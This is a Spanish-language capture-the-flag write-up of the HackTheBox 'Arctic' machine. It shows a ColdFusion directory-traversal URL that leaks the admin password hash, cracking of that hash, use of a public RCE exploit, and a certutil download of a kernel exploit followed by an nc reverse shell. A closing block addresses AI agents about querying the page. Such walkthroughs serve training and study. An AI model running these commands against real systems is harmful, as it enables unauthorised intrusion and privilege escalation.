# Arctic

### 🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

```bash
ping -c 1 10.10.10.11
```

para verificar la conectividad de red.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FCbR9SlJqEihC5CAmOYBa%2Fimage.png?alt=media&#x26;token=a18ac0a2-1b65-44b1-8de7-725030e820f3" alt=""><figcaption></figcaption></figure>

A continuación, realizamos el comando:

```bash
nmap -sC -sV 10.10.10.11
```

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2F1EGNy3CT6GTB3JL1Rf5c%2Fimage.png?alt=media&#x26;token=b2f3b350-1714-4371-b16d-f4df7e73a6c2" alt=""><figcaption></figcaption></figure>

Durante el escaneo se identificaron los siguientes puertos abiertos:

* **Puerto 135 (MSRPC)**: Este puerto es utilizado por Microsoft Windows RPC (Remote Procedure Call). Puede ser un objetivo para ataques de enumeración, explotación de vulnerabilidades en versiones desactualizadas o abuso de privilegios a través de DCOM.
* **Puerto 8500**: Identificado con un servicio desconocido (`fmtp?`). Se recomienda realizar un escaneo más profundo para determinar su funcionalidad y verificar si está asociado con software vulnerable.
* **Puerto 49154 (MSRPC)**: Otro puerto de Microsoft Windows RPC, comúnmente utilizado para comunicaciones internas del sistema. Puede ser investigado para determinar si existen configuraciones inseguras o vulnerabilidades explotables.

A continuación, se procederá a analizar cada uno de estos servicios en busca de posibles vectores de ataque.

### 🔎 EXPLORACIÓN

Se utiliza el comando:

```bash
sudo nmap -sCV -p135,8500,49154 -v 10.10.10.11
```

para que nos proporcione más información sobre esos puertos específicamente.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FINoWSM3pDI18uc4kNI4L%2Fimage.png?alt=media&#x26;token=deaa36f3-4b0f-4ae7-8f42-f2239f910ebd" alt=""><figcaption></figcaption></figure>

A través del puerto **8500** corre una página web. Indagando un poco encontramos un panel de **Login** en el directorio `/administrator`. Es un panel de **Adobe Coldfusion**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FDDo3wivxYZKTQLSqDTSJ%2Fimage.png?alt=media&#x26;token=5bf7440b-d095-4378-af72-019d5b906e1e" alt=""><figcaption></figcaption></figure>

Buscamos exploits para explotarlo con Metasploit.

### 🚀 **EXPLOTACIÓN**

{% embed url="<https://www.exploit-db.com/exploits/14641>" %}

Vemos que es un Directory Traversal y nos sale la dirección comentada.

```bash
http://10.10.10.11/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FKvNMGSnuSxez4ESbG4YQ%2Fimage.png?alt=media&#x26;token=599d5c50-7594-4101-9b11-6dcc330bda06" alt=""><figcaption></figcaption></figure>

Vemos que la contraseña es un hash entonces con John vamos a crackearlo.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FGHeEGZRpNbHgNqALD6g7%2Fimage.png?alt=media&#x26;token=bd9e5806-9599-4ffc-8cde-2b959480ec88" alt=""><figcaption></figcaption></figure>

```
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-sha1 hash
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fm5HRnWeH2oVdEGhzprXh%2Fimage.png?alt=media&#x26;token=4997748b-6c20-4857-a4d4-96c9a5b335a7" alt=""><figcaption></figcaption></figure>

Tenemos la contraseña de admin por lo que nos logueamos.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FP3BNL7c1BOZtB31HP9xm%2Fimage.png?alt=media&#x26;token=6d9dc301-83ff-43ef-ae00-0374b62bcae5" alt=""><figcaption></figcaption></figure>

Buscando más exploits encontramos un RCE.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FQPR2nVaGDOh3itwTk9UE%2Fimage.png?alt=media&#x26;token=8c35f2d7-0092-4901-957a-27000477d6b0" alt=""><figcaption></figcaption></figure>

Nos la descargamos.

```bash
searchsploit -m cfm/webapps/50057.py
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FLkoAcoqTOKIihZzKFayO%2Fimage.png?alt=media&#x26;token=3bc9639b-7e2b-4b8d-8a1a-a571f64b9fd9" alt=""><figcaption></figcaption></figure>

Ejecutamos.

```
python3 50057.py
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FCGiBHAXbjNwyDnbhc64x%2Fimage.png?alt=media&#x26;token=f17c6329-faf7-4dba-95f4-ebdcf9694166" alt=""><figcaption></figcaption></figure>

### 🔐 **PRIVILEGIOS**

Para escalar privilegios ya que WinPeas no funciona usamos esto.

{% @github-files/github-code-block url="<https://github.com/bitsadmin/wesng>" %}

```
python3 wes.py system_info.txt -i "Elevation of Privilege" -e                                  
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FBQ6vNZHPAbPBRF0bRAxQ%2Fimage.png?alt=media&#x26;token=2c458b07-f8a4-416e-874b-920c6c9d935e" alt=""><figcaption></figcaption></figure>

Se identificó un exploit que es el que vamos a usar para escalar privilegios.

{% embed url="<https://www.exploit-db.com/exploits/14610?source=post_page-----9548f1285d56--------------------------------------->" %}

{% @github-files/github-code-block url="<https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059%3A%20Chimichurri/Compiled>" %}

```bash
certutil.exe -urlcache -f http://10.10.14.14:8000/Chimichurri.exe c.exe
```

Nos ponemo en escucha mientras ejecutamos el archivo.

```
nc -lvnp 4444
c.exe 10.10.14.14 4444
```

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FGEbdAiWebcH8Y64F7kh9%2Fimage.png?alt=media&#x26;token=f07d46a6-676f-4e16-90a1-d81447744f1c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2FshjgtE5cSYfvaeXQZG7F%2Fimage.png?alt=media&#x26;token=f04c99bc-67a0-415f-96d8-554ace2f26e5" alt=""><figcaption></figcaption></figure>

Ya somos **root**.

<figure><img src="https://469389308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbKXfRjFOYJgGlV1An6Cf%2Fuploads%2Fgj1Vudhv6rSTDuurxWaz%2FCaptura%20de%20pantalla%202025-02-18%20233057.png?alt=media&#x26;token=12ab42e5-24a0-47d7-ad29-c04e2e0ab41f" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://beafn28.gitbook.io/beafn28/writeups/hackthebox/arctic.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.